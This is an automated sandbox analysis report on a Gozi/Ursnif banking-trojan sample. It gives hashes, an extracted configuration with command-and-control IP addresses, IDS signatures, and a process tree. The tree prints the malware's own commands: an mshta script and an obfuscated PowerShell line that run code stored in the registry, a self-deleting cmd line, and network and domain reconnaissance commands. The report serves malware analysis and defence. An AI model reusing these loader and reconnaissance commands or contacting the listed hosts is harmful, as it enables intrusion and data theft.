Analysis
-
max time kernel
4294180s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
22/03/2022, 15:41
Static task
static1
Behavioral task
behavioral1
Sample
d41d05cc157f874f89c574c74c0e2c58.exe
Resource
win7-20220311-en
General
-
Target
d41d05cc157f874f89c574c74c0e2c58.exe
-
Size
739KB
-
MD5
d41d05cc157f874f89c574c74c0e2c58
-
SHA1
1e0df409d72db144f570b9d8410b544c8670e64d
-
SHA256
0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
-
SHA512
fa36e9217d4af43d14870e0fdc380e3ce25674ca0ff55faba604e3b025be06e9c01fadb2807a6809962defc353ca21ea85218115e3624961d6989484115f20ba
Malware Config
Extracted
gozi_ifsb
777999
config.edge.skype.com
146.70.35.138
146.70.35.142
-
base_path
/phpadmin/
-
build
250225
-
exe_type
loader
-
extension
.src
-
server_id
50
Extracted
gozi_ifsb
777999
config.edge.skype.com
67.43.234.14
67.43.234.37
67.43.234.47
-
base_path
/images/
-
build
250225
-
exe_type
worker
-
extension
.src
-
server_id
50
Signatures
-
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
-
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
-
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
-
Deletes itself 1 IoCs
pid Process 1912 cmd.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1608 set thread context of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 532 set thread context of 1192 532 powershell.exe 6 PID 1192 set thread context of 1912 1192 Explorer.EXE 38 PID 1912 set thread context of 1604 1912 cmd.exe 40 PID 1192 set thread context of 1452 1192 Explorer.EXE 52 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 1068 net.exe 532 net.exe 916 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1184 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1308 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1604 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1604 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 976 d41d05cc157f874f89c574c74c0e2c58.exe 532 powershell.exe 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 532 powershell.exe 1192 Explorer.EXE 1912 cmd.exe 1192 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 1184 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1192 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1608 wrote to memory of 976 1608 d41d05cc157f874f89c574c74c0e2c58.exe 27 PID 1928 wrote to memory of 532 1928 mshta.exe 31 PID 1928 wrote to memory of 532 1928 mshta.exe 31 PID 1928 wrote to memory of 532 1928 mshta.exe 31 PID 532 wrote to memory of 1452 532 powershell.exe 34 PID 532 wrote to memory of 1452 532 powershell.exe 34 PID 532 wrote to memory of 1452 532 powershell.exe 34 PID 1452 wrote to memory of 1616 1452 csc.exe 35 PID 1452 wrote to memory of 1616 1452 csc.exe 35 PID 1452 wrote to memory of 1616 1452 csc.exe 35 PID 532 wrote to memory of 1696 532 powershell.exe 36 PID 532 wrote to memory of 1696 532 powershell.exe 36 PID 532 wrote to memory of 1696 532 powershell.exe 36 PID 1696 wrote to memory of 1344 1696 csc.exe 37 PID 1696 wrote to memory of 1344 1696 csc.exe 37 PID 1696 wrote to memory of 1344 1696 csc.exe 37 PID 532 wrote to memory of 1192 532 powershell.exe 6 PID 532 wrote to memory of 1192 532 powershell.exe 6 PID 532 wrote to memory of 1192 532 powershell.exe 6 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1192 wrote to memory of 1912 1192 Explorer.EXE 38 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1912 wrote to memory of 1604 1912 cmd.exe 40 PID 1192 wrote to memory of 1652 1192 Explorer.EXE 43 PID 1192 wrote to memory of 1652 1192 Explorer.EXE 43 PID 1192 wrote to memory of 1652 1192 Explorer.EXE 43 PID 1652 wrote to memory of 1796 1652 cmd.exe 45 PID 1652 wrote to memory of 1796 1652 cmd.exe 45 PID 1652 wrote to memory of 1796 1652 cmd.exe 45 PID 1192 wrote to memory of 908 1192 Explorer.EXE 47 PID 1192 wrote to memory of 908 1192 Explorer.EXE 47 PID 1192 wrote to memory of 908 1192 Explorer.EXE 47 PID 1192 wrote to memory of 1708 1192 Explorer.EXE 48 PID 1192 wrote to memory of 1708 1192 Explorer.EXE 48 PID 1192 wrote to memory of 1708 1192 Explorer.EXE 48 PID 1708 wrote to memory of 1308 1708 cmd.exe 50 PID 1708 wrote to memory of 1308 1708 cmd.exe 50 PID 1708 wrote to memory of 1308 1708 cmd.exe 50 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1452 1192 Explorer.EXE 52 PID 1192 wrote to memory of 1224 1192 Explorer.EXE 54 PID 1192 wrote to memory of 1224 1192 Explorer.EXE 54 PID 1192 wrote to memory of 1224 1192 Explorer.EXE 54 PID 1192 wrote to memory of 1812 1192 Explorer.EXE 56 PID 1192 wrote to memory of 1812 1192 Explorer.EXE 56 PID 1192 wrote to memory of 1812 1192 Explorer.EXE 56
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:976
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp"5⤵PID:1616
-
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp"5⤵PID:1344
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1604
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\71B8.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1796
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\71B8.bi1"2⤵PID:908
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1308
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1452
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1224
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1812
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1068
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1764
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1584
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1652
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:2040
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1008
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1540
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:600
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:532
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1788
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1976
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1568
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1068
-
C:\Windows\system32\net.exenet config workstation3⤵PID:432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:1764
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:108
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1704
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:764
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:2004
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1620
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:1460
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1576
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1844
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:532
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1240
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:1680
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:916
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:2032
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\B64C.bin1 > C:\Users\Admin\AppData\Local\Temp\B64C.bin & del C:\Users\Admin\AppData\Local\Temp\B64C.bin1"2⤵PID:864
-